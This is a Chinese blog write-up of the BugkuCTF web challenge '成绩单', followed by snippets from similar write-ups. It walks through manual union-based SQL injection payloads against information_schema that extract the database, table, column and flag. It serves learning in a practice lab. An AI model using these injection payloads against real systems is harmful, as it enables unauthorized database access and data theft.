BugkuCTF之web题之成绩单

最新推荐文章于 2024-09-04 17:42:38 发布
最新推荐文章于 2024-09-04 17:42:38 发布
阅读量6.2k 收藏 7
点赞数 7
分类专栏: CTF题 BUGKUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/84887630
版权
CTF题 同时被 2 个专栏收录
115 篇文章 18 订阅
订阅专栏
BUGKUCTF
11 篇文章 2 订阅
订阅专栏

BugkuCTF之web题之成绩单

1.向其中分别输入1,2,3…发现可以查询,当向其中输入1’时,程序不能查询,根据观察题目,猜测应该可以大概判断出有四个字段
在这里插入图片描述

2.在成绩查询处开始爆数据库名,输入0’ union select database(),2,3,4 #
得到:
在这里插入图片描述
说明数据库的名为skctf_flag

3.在成绩查询处开始爆数据库表名,输入0’ union select table_name,2,3,4 from information_schema.tables where table_schema=‘skctf_flag’#
得到:
在这里插入图片描述
说明数据库的表名为fl4g

4.在成绩查询处开始爆数据库列名,输入0’ union select column_name,2,3,4 from information_schema.columns where table_name=‘fl4g’#
得到:
在这里插入图片描述
说明数据库的列名为skctf_flag

5.查看skctf_flag的数据.0’ union select skctf_flag,2,3,4 from fl4g#
得到:
在这里插入图片描述
flag也就呼之欲出了!!!

A_dmins
关注
专栏目录
BugkuCTF-web-成绩单 writeup
kuller_Yan的博客
03-26 439
记一次简单的SQL注入 目传送门,点击即走 首先分析目:进入目网页就可以看到这个 遇到表单,当然要填一填,看看有什么变化。于是我根据目提示输入1。仔细观察可以发现输入1,并且返回后,出现了龙龙龙的成绩单以及四份数据。 于是打开hackbar,post提交 正常返回,加 ’ 测试一下 啥也不是,再加个 # 又正常了。 那么基本可以认定是SQL注入无疑了。 两种解方法: 1:手...
CTF|BugkuCTF-WEB思路
这里是一处长期不更新的博客
06-15 2002
截止至练习【login4】,仅提供解思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugkuCTF Web成绩单
_Kisaragi_的博客
07-17 312
目描述: 进入目页面: 随便输入一点东西看看,输入1: 输入2: 初步判断这是一个查询系统,应该和SQL注入有关。 先看看回显字段个数,假设有4个回显字段,在查询框中输入语句: 1' order by 4# 正常回显: 将4改成5,再试试: 1' order by 5# 回显消失了,说明回显字段的个数是4个。 下面获取回显位置,构造语句: -1' union select 1, 2, 3, 4# 从图中我们可以得知,表格中回显的位置是2,3,4
完胜LoadRunner!Jmeter并发性能测试总结
最新发布
伤心的辣条
09-04 793
之前在项目中用LoadRunner进行并发性能测试,后改用Jmeter更为简便快捷,笔者认为这也是开源工具颇受欢迎的原因之一吧。本次继之前的分享更新了一版,近期项目做个小结,希望大家也可以有新的收获!
Bugku CTF-web17 成绩单
weixin_44023403的博客
05-15 360
Bugku CTF-web17成绩单前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
MySQL的information_schema数据库
简单即美
09-07 1128
摘自http://www.cnitman.com/mysql-information_schema-explain/;可对照参考文档来理解,http://dev.mysql.com/doc/refman/5.1/en/information-schema.html 大家在安
BugkuCTF成绩单查询
qq_33505576的博客
06-27 748
SQL注入 https://blog.csdn.net/Langtuteng17/article/details/80666660
BugkuCTF练习解——Web
qq_41739275的博客
08-24 6648
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugkuCTF成绩单web
s0il的博客
04-02 788
目描述: 让人看上去就是SQL注入。 提交一下,出现三列属性,flag就应该在这里面: 手动注入: 在表单中输入1或者1#或者1--或者1++等返回正常,输入1'返回异常 库名、表名、字段名的获取: 联合查询 id=-1' union select 1,2,3,4# 之后返回: 或者执行-1' orde...
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 3822
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
CTF练习[WEB]-成绩查询
weixin_45246254的博客
01-05 1865
https://ctf.bugku.com/challenges/detail/id/84.html?page=4 拿到目如下 查询处考虑sql注入 查询一下 没有报错信息,直接把请求包丢到sqlmap里面 发现union注入 查看当前数据库 查看数据表 发现f14g表 直接dump 获得flag ...
bugku ctf 成绩查询思路
YouthBelief的博客
03-08 1122
0x00 环境地址 https://ctf.bugku.com/challenges/detail/id/84.html 成绩查询 大概率sql注入 0x01 解思路 1.1 根据提示输入1 2 3 测试正常数据 1 2 看来是根据id查询 1.2 测试是否报错(不产生报错) ' " ') ") % %) )) 等等 1.3 猜测sql语句为 select Math_score,English_score,Chinese_score from score_table where
BugKu_成绩查询
Kobalos的博客
08-12 141
访问目标地址 可以看到是个成绩查询的简单小功能,输入一个1抓包试试 可以看到一个id参数,疑似注入,上sqlmap! 存在注入! 最后也是成功得到flag!
web——成绩单(90)——Bugku
Zichel77的博客
08-07 395
0×00 靶场链接 http://123.206.87.240:8002/chengjidan/ 0×01 目描述 应该就是一个注入了 0×02 解过程 输入1 输入2 输入3 输入4 说明一共就3个字段 现在尝试一下手注 输入1'--+ 依旧报错 再试试1' 依旧报错 再试试1'# 没有报错了 这说明本--+被过滤掉了 再来看数据库有几列 1234对应的数据库分别有:姓名,Math,English,C...
Bugku-成绩查询
qq_51553814的博客
07-15 450
Bugku-成绩查询主要考点是sql注入,一个很简单的字符型注入,没有屏蔽任何字符 使用sqlmap更简单,但是为了熟悉和复习还是决定自己做。 解方法 打开环境,如图是一个需要用户输入的文本框,看到目和文本框,首先就能想到sql注入 根据目要求尝试输入1试试,返回了下面一个页面 接下来就要判断它是属于什么类型的注入了,先输入一个 1’ ,发现页面没有返回,再输入1’ #,返回正常页面 基本可以确定是字符型注入了,并且一番确认后发现,没有屏蔽任何的字符,所以这应该就是一道入门的sql字符注入
BugkuCTF-web-成绩单 WP
会下雪的晴天
07-12 1705
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:最基本的SQL注入 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 目描述 解传送门:http://123.206.87.240:8002/chengjidan/ 解思路 查看源...
成绩单
WYJ____的博客
08-15 491
0' union select 1,2,3,4# 0' union select 1,database(),3,4#    0' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='skctf_flag'# 0' union select 1...
【CTF-webbugku-成绩查询(sql注入)
Sankkl1的博客
08-17 679
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
bugku 成绩单详解
qq_35811830的博客
01-26 1268
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
2021 BugKu CTF AWD排位赛真解析
本资源为2021年BugKu组织的CTF竞赛的排位赛部分的目之一。 CTF比赛通常分为多个环节,包括但不限于密码学(Crypto)、逆向工程(Reverse Engineering)、二进制分析(Binary Analysis)、漏洞挖掘(Pwn)、Web...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值